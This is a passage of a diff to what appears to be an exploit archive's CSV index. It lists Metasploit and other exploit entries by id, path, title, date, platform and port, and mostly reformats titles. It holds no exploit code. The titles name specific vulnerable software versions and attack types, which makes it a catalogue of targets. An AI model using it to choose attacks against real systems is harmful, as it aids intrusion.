16488,platforms/windows/remote/16488.rb,"Novell NetMail 3.52d - IMAP APPEND Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 - Client Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 @@ -14302,7 +14301,7 @@ id,file,description,date,author,platform,type,port 16499,platforms/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration",2010-09-20,Metasploit,windows,remote,0 16500,platforms/windows/remote/16500.rb,"Hyleos ChemView - ActiveX Control Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0 16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 -16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module - Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (1)",2010-04-30,Metasploit,windows,local,0 16504,platforms/windows/local/16504.rb,"Adobe - util.printf() Buffer Overflow",2010-05-03,Metasploit,windows,local,0 16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14310,7 +14309,7 @@ id,file,description,date,author,platform,type,port 16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16508,platforms/windows/remote/16508.rb,"Novell iPrint Client - ActiveX Control Buffer Overflow",2008-06-16,Metasploit,windows,remote,0 16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit",2011-02-22,Metasploit,windows,remote,0 -16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager Stack Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager - Stack Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16511,platforms/windows/remote/16511.rb,"Logitech VideoCall - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj - ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 16513,platforms/windows/remote/16513.rb,"Ultra Shareware Office Control - ActiveX HttpUpload Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 @@ -14330,7 +14329,7 @@ id,file,description,date,author,platform,type,port 16527,platforms/windows/remote/16527.rb,"Apple QuickTime 7.1.3 - RTSP URI Buffer Overflow",2010-05-04,Metasploit,windows,remote,0 16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16529,platforms/windows/remote/16529.rb,"WinDVD7 - IASystemInfo.DLL ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16530,platforms/windows/remote/16530.rb,"mIRC IRC URL Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16530,platforms/windows/remote/16530.rb,"mIRC - IRC URL Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow",2010-04-30,Metasploit,windows,local,0 16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling",2010-07-03,Metasploit,windows,remote,0 16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use-After-Free",2011-02-08,Metasploit,windows,remote,0 @@ -14369,7 +14368,7 @@ id,file,description,date,author,platform,type,port 16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow",2010-07-26,Metasploit,windows,remote,0 16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption",2010-04-30,Metasploit,windows,remote,0 16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE - JuniperSetupDLL.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16569,platforms/windows/remote/16569.rb,"Orbit Downloader Connecting Log Creation Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16569,platforms/windows/remote/16569.rb,"Orbit Downloader - Connecting Log Creation Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16570,platforms/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 - SceneURL Download and Execute",2010-09-20,Metasploit,windows,remote,0 16571,platforms/windows/remote/16571.rb,"iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16572,platforms/windows/remote/16572.rb,"GOM Player - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14434,7 +14433,7 @@ id,file,description,date,author,platform,type,port 16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (1)",2010-09-25,Metasploit,windows,local,0 16632,platforms/windows/local/16632.rb,"ACDSee - XPM File Section Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 -16634,platforms/windows/local/16634.rb,"Free Download Manager Torrent Parsing Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16635,platforms/windows/remote/16635.rb,"activePDF WebGrabber - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - (.pls) Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16637,platforms/windows/local/16637.rb,"VideoLAN VLC - MKV Memory Corruption",2011-02-08,Metasploit,windows,local,0 @@ -14443,7 +14442,7 @@ id,file,description,date,author,platform,type,port 16640,platforms/windows/local/16640.rb,"FeedDemon 3.1.0.12 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow",2010-09-25,Metasploit,windows,remote,0 16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 -16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote GROUPNAME Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote - GROUPNAME Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - (.DWB) Stack Buffer Overflow",2010-04-05,Metasploit,windows,local,0 16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 HT3 - File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 @@ -14465,7 +14464,7 @@ id,file,description,date,author,platform,type,port 16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow Exploit",2010-09-25,Metasploit,windows,local,0 -16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16666,platforms/windows/local/16666.rb,"UltraISO - .CCD File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Remote Code Execution",2010-11-01,Metasploit,windows,local,0 16668,platforms/windows/local/16668.rb,"BACnet OPC Client - Buffer Overflow",2010-11-14,Metasploit,windows,local,0 @@ -14497,9 +14496,9 @@ id,file,description,date,author,platform,type,port 16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 beta 5 - Buffer Overflow",2010-09-20,Metasploit,windows,remote,26000 16695,platforms/windows/remote/16695.rb,"Medal Of Honor Allied Assault - getinfo Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,12203 16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - STMux.exe Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,1533 -16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",2010-11-11,Metasploit,windows,remote,80 +16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server - Accept-Language Stack Buffer Overflow",2010-11-11,Metasploit,windows,remote,80 16698,platforms/windows/remote/16698.rb,"Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,Metasploit,windows,remote,0 -16699,platforms/windows/remote/16699.rb,"Outlook ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,Metasploit,windows,remote,0 +16699,platforms/windows/remote/16699.rb,"Outlook - ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,Metasploit,windows,remote,0 16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution",2010-09-20,Metasploit,windows,remote,0 16701,platforms/windows/remote/16701.rb,"MySQL yaSSL - SSL Hello Message Buffer Overflow (Windows)",2010-05-09,Metasploit,windows,remote,3306 16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow",2010-04-30,Metasploit,windows,remote,21 @@ -14523,17 +14522,17 @@ id,file,description,date,author,platform,type,port 16720,platforms/windows/remote/16720.rb,"FTP Synchronizer Professional 4.0.73.274 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16721,platforms/windows/remote/16721.rb,"FileWrangler 5.30 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16722,platforms/windows/remote/16722.rb,"Xlink FTP Client - Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon PORT Command Memory Corruption",2010-09-20,Metasploit,windows,remote,0 +16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon - PORT Command Memory Corruption",2010-09-20,Metasploit,windows,remote,0 16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - Username Overflow",2010-07-03,Metasploit,windows,remote,0 16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,Metasploit,windows,remote,0 16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 -16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve FTP PORT Buffer Overflow",2010-04-30,Metasploit,windows,remote,5554 -16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 -16729,platforms/windows/remote/16729.rb,"SlimFTPd LIST Concatenation Overflow",2010-10-05,Metasploit,windows,remote,0 +16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve - FTP PORT Buffer Overflow",2010-04-30,Metasploit,windows,remote,5554 +16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 +16729,platforms/windows/remote/16729.rb,"SlimFTPd - LIST Concatenation Overflow",2010-10-05,Metasploit,windows,remote,0 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP - Username Overflow",2010-09-20,Metasploit,windows,remote,0 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB - FTP PASS Overflow (Win32)",2010-04-30,Metasploit,win_x86,remote,0 16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0 -16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version",2010-04-30,Metasploit,windows,remote,21 +16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version - Exploit",2010-04-30,Metasploit,windows,remote,21 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow",2010-08-03,Metasploit,windows,remote,0 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow",2010-10-05,Metasploit,windows,remote,0 16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 @@ -14549,7 +14548,7 @@ id,file,description,date,author,platform,type,port 16746,platforms/windows/remote/16746.rb,"SentinelLM UDP Buffer Overflow",2010-05-09,Metasploit,windows,remote,5093 16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service - Path Overflow",2010-05-09,Metasploit,windows,remote,2103 16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow (TCP)",2010-07-25,Metasploit,windows,remote,0 -16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface Overflow",2011-01-11,Metasploit,windows,remote,0 +16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow",2011-01-11,Metasploit,windows,remote,0 16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow",2010-07-25,Metasploit,windows,remote,0 16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow",2010-04-30,Metasploit,win_x86,remote,0 16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite - LDAP protocol Buffer Overflow",2010-02-15,Metasploit,windows,remote,80 @@ -14568,24 +14567,24 @@ id,file,description,date,author,platform,type,port 16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - Database Parameter Overflow",2010-09-20,Metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,8080 16767,platforms/windows/remote/16767.rb,"IA WebMail 3.x - Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 -16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan Remote Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan - Remote Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 - iMonitor Remote Stack Buffer Overflow",2010-07-13,Metasploit,windows,remote,8008 16770,platforms/windows/remote/16770.rb,"Savant 3.1 Web Server - Overflow",2010-10-04,Metasploit,windows,remote,0 16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow",2010-08-17,Metasploit,windows,remote,8080 -16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server Authentication Request Handling Buffer Overflow",2010-08-06,Metasploit,windows,remote,80 +16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow",2010-08-06,Metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server Host Header Overflow",2010-05-09,Metasploit,windows,remote,8028 16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.EXE Pre-Authentication Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0 16775,platforms/windows/webapps/16775.rb,"Rhinosoft Serv-U Session Cookie Buffer Overflow",2010-03-10,Metasploit,windows,webapps,0 16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow",2010-02-15,Metasploit,windows,remote,0 -16777,platforms/windows/remote/16777.rb,"Free Download Manager Remote Control Server Buffer Overflow",2010-07-13,Metasploit,windows,remote,80 -16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow",2010-12-15,Metasploit,windows,remote,18881 -16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway Buffer Overflow",2010-05-09,Metasploit,windows,remote,8800 +16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow",2010-07-13,Metasploit,windows,remote,80 +16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow",2010-12-15,Metasploit,windows,remote,18881 +16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow",2010-05-09,Metasploit,windows,remote,8800 16780,platforms/cgi/webapps/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow",2010-11-11,Metasploit,cgi,webapps,0 16781,platforms/windows/remote/16781.rb,"MailEnable - Authorization Header Buffer Overflow",2010-07-07,Metasploit,windows,remote,0 16782,platforms/windows/remote/16782.rb,"Apache - (Win32) Chunked Encoding",2010-07-07,Metasploit,windows,remote,0 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot Overflow",2010-09-20,Metasploit,win_x86,remote,0 16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,Metasploit,multiple,remote,80 -16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration Buffer Overflow",2010-11-24,Metasploit,windows,remote,80 +16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration - Buffer Overflow",2010-11-24,Metasploit,windows,remote,80 16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 - URL Handling Buffer Overflow (Win32)",2010-09-20,Metasploit,windows,remote,7144 16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,Metasploit,windows,remote,0 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execute",2010-11-24,Metasploit,cfm,webapps,0 @@ -14601,17 +14600,17 @@ id,file,description,date,author,platform,type,port 16798,platforms/windows/remote/16798.rb,"Apache mod_jk 1.2.20 - Buffer Overflow",2010-07-25,Metasploit,windows,remote,0 16799,platforms/windows/remote/16799.rb,"HTTPDX - h_handlepeer() Function Buffer Overflow",2010-07-26,Metasploit,windows,remote,0 16800,platforms/windows/remote/16800.rb,"Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow",2010-06-11,Metasploit,windows,remote,8000 -16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway Debug Mode Buffer Overflow",2010-04-30,Metasploit,windows,remote,5250 +16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway - Debug Mode Buffer Overflow",2010-04-30,Metasploit,windows,remote,5250 16802,platforms/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow",2010-11-03,Metasploit,windows,remote,0 16803,platforms/windows/remote/16803.rb,"Alt-N SecurityGateway - username Buffer Overflow",2010-07-07,Metasploit,windows,remote,4000 -16804,platforms/windows/remote/16804.rb,"Belkin Bulldog Plus Web Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 +16804,platforms/windows/remote/16804.rb,"Belkin Bulldog Plus - Web Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 16805,platforms/windows/remote/16805.rb,"HP OpenView Network Node Manager - OpenView5.exe CGI Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 16806,platforms/windows/remote/16806.rb,"BadBlue 2.72b - PassThru Buffer Overflow",2010-07-08,Metasploit,windows,remote,0 16807,platforms/windows/remote/16807.rb,"InterSystems Cache - UtilConfigHome.csp Argument Buffer Overflow",2010-07-12,Metasploit,windows,remote,57772 16808,platforms/windows/remote/16808.rb,"NaviCOPA 2.0.1 - URL Handling Buffer Overflow",2010-07-12,Metasploit,windows,remote,80 16809,platforms/win_x86/remote/16809.rb,"Oracle 9i XDB - HTTP PASS Overflow (Win32)",2010-09-20,Metasploit,win_x86,remote,8080 16810,platforms/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x - rembo.exe Buffer Overflow",2010-09-20,Metasploit,windows,remote,443 -16811,platforms/windows/webapps/16811.rb,"TrackerCam PHP Argument Buffer Overflow",2010-05-09,Metasploit,windows,webapps,8090 +16811,platforms/windows/webapps/16811.rb,"TrackerCam - PHP Argument Buffer Overflow",2010-05-09,Metasploit,windows,webapps,8090 16812,platforms/windows/remote/16812.rb,"MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow",2010-07-01,Metasploit,windows,remote,3000 16813,platforms/windows/remote/16813.rb,"Novell NetMail 3.52d - NMAP STOR Buffer Overflow",2010-05-09,Metasploit,windows,remote,689 16814,platforms/windows/remote/16814.rb,"Novell GroupWise Messenger Client Buffer Overflow",2010-06-22,Metasploit,windows,remote,8300 @@ -14625,13 +14624,13 @@ id,file,description,date,author,platform,type,port 16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow",2010-04-30,Metasploit,windows,remote,25 16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow",2010-11-14,Metasploit,windows,remote,389 16824,platforms/windows/remote/16824.rb,"IMail LDAP Service Buffer Overflow",2010-04-30,Metasploit,windows,remote,389 -16825,platforms/windows/remote/16825.rb,"CA CAM log_security() Stack Buffer Overflow (Win32)",2010-09-20,Metasploit,windows,remote,0 +16825,platforms/windows/remote/16825.rb,"CA CAM - log_security() Stack Buffer Overflow (Win32)",2010-09-20,Metasploit,windows,remote,0 16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service Buffer Overflow",2010-05-13,Metasploit,windows,remote,38292 16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 - CreateBinding() Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16829,platforms/windows/remote/16829.rb,"Trend Micro ServerProtect 5.58 - EarthAgent.EXE Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16830,platforms/windows/remote/16830.rb,"Symantec Remote Management Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16831,platforms/windows/remote/16831.rb,"SafeNet SoftRemote IKE Service Buffer Overflow",2010-06-22,Metasploit,windows,remote,62514 +16830,platforms/windows/remote/16830.rb,"Symantec Remote Management - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16831,platforms/windows/remote/16831.rb,"SafeNet SoftRemote - IKE Service Buffer Overflow",2010-06-22,Metasploit,windows,remote,62514 16832,platforms/netware/remote/16832.rb,"Novell NetWare - LSASS CIFS.NLM Driver Stack Buffer Overflow",2010-05-09,Metasploit,netware,remote,0 16833,platforms/netware/remote/16833.rb,"NetWare 6.5 - SunRPC Portmapper CALLIT Stack Buffer Overflow",2010-11-14,Metasploit,netware,remote,111 16834,platforms/linux/remote/16834.rb,"Snort Back Orifice - Pre-Preprocessor Remote Exploit",2010-07-03,Metasploit,linux,remote,0 @@ -14650,7 +14649,7 @@ id,file,description,date,author,platform,type,port 16847,platforms/linux/remote/16847.rb,"Squid NTLM Authenticate Overflow",2010-04-30,Metasploit,linux,remote,0 16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - 'secure' Overflow (Linux)",2010-09-20,Metasploit,linux,remote,0 16849,platforms/linux/remote/16849.rb,"MySQL yaSSL - SSL Hello Message Buffer Overflow (Linux)",2010-05-09,Metasploit,linux,remote,0 -16850,platforms/linux/remote/16850.rb,"MySQL yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,Metasploit,linux,remote,0 +16850,platforms/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,Metasploit,linux,remote,0 16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 < 1.3.3b - Telnet IAC Buffer Overflow (Linux)",2011-01-09,Metasploit,linux,remote,0 16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,Metasploit,linux,remote,0 16853,platforms/linux/remote/16853.rb,"Berlios GPSD Format String",2010-04-30,Metasploit,linux,remote,0 @@ -14659,17 +14658,17 @@ id,file,description,date,author,platform,type,port 16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTP Daemon - Arbitrary Command Execution",2010-07-07,Metasploit,cgi,webapps,0 16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise - masterCGI Arbitrary Command Execution",2010-10-05,Metasploit,cgi,webapps,0 16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package - passwd.php3 Arbitrary Command Execution",2010-10-18,Metasploit,php,webapps,0 -16859,platforms/linux/remote/16859.rb,"Samba lsa_io_trans_names Heap Overflow (Linux)",2010-07-14,Metasploit,linux,remote,0 +16859,platforms/linux/remote/16859.rb,"Samba - lsa_io_trans_names Heap Overflow (Linux)",2010-07-14,Metasploit,linux,remote,0 16860,platforms/linux/remote/16860.rb,"Samba - chain_reply Memory Corruption (Linux x86)",2010-09-04,Metasploit,linux,remote,0 16861,platforms/linux/remote/16861.rb,"Samba - trans2open Overflow (Linux x86)",2010-07-14,Metasploit,linux,remote,0 16862,platforms/hardware/remote/16862.rb,"iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)",2010-09-20,Metasploit,hardware,remote,0 -16863,platforms/osx/remote/16863.rb,"AppleFileServer LoginExt PathName Overflow",2010-09-20,Metasploit,osx,remote,0 +16863,platforms/osx/remote/16863.rb,"AppleFileServer - LoginExt PathName Overflow",2010-09-20,Metasploit,osx,remote,0 16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client - Buffer Overflow Exploit (OSX)",2010-10-09,Metasploit,osx,remote,0 16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 - Overflow (Mac OS X)",2010-05-09,Metasploit,osx,remote,0 16866,platforms/unix/remote/16866.rb,"Safari - Archive Metadata Command Execution",2010-09-20,Metasploit,unix,remote,0 16867,platforms/osx/remote/16867.rb,"Apple OS X Software Update - Command Execution",2010-09-20,Metasploit,osx,remote,0 16868,platforms/hardware/remote/16868.rb,"iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,Metasploit,hardware,remote,0 -16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail LibTIFF Buffer Overflow",2010-09-20,Metasploit,hardware,remote,0 +16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail - LibTIFF Buffer Overflow",2010-09-20,Metasploit,hardware,remote,0 16870,platforms/multiple/remote/16870.rb,"Mail.app - Image Attachment Command Execution",2011-03-05,Metasploit,multiple,remote,0 16871,platforms/osx/remote/16871.rb,"Mac OS X - mDNSResponder UPnP Location Overflow",2011-01-08,Metasploit,osx,remote,0 16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server - USER Overflow",2010-09-20,Metasploit,osx,remote,0 @@ -14708,11 +14707,11 @@ id,file,description,date,author,platform,type,port 16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution",2010-07-14,Metasploit,cgi,webapps,0 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution",2010-07-03,Metasploit,php,webapps,0 16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,Metasploit,linux,remote,0 -16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,Metasploit,php,webapps,0 +16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula - Remote PHP Code Execution",2010-09-20,Metasploit,php,webapps,0 16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class mosConfig_absolute_path Remote File Inclusion",2010-11-24,Metasploit,php,webapps,0 16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection",2010-07-03,Metasploit,php,webapps,0 16914,platforms/cgi/webapps/16914.rb,"Matt Wright guestbook.pl - Arbitrary Command Execution",2010-07-03,Metasploit,cgi,webapps,0 -16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent Command Injection",2010-10-25,Metasploit,linux,remote,0 +16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection",2010-10-25,Metasploit,linux,remote,0 16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution",2011-03-03,Metasploit,linux,remote,0 16917,platforms/php/webapps/16917.rb,"Dogfood CRM - spell.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0 16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection",2010-07-03,Metasploit,freebsd,remote,0 @@ -14739,10 +14738,10 @@ id,file,description,date,author,platform,type,port 16939,platforms/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",multiple,dos,0 16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service - Privilege Escalation Exploit (0Day)",2011-03-08,XenoMuta,windows,local,0 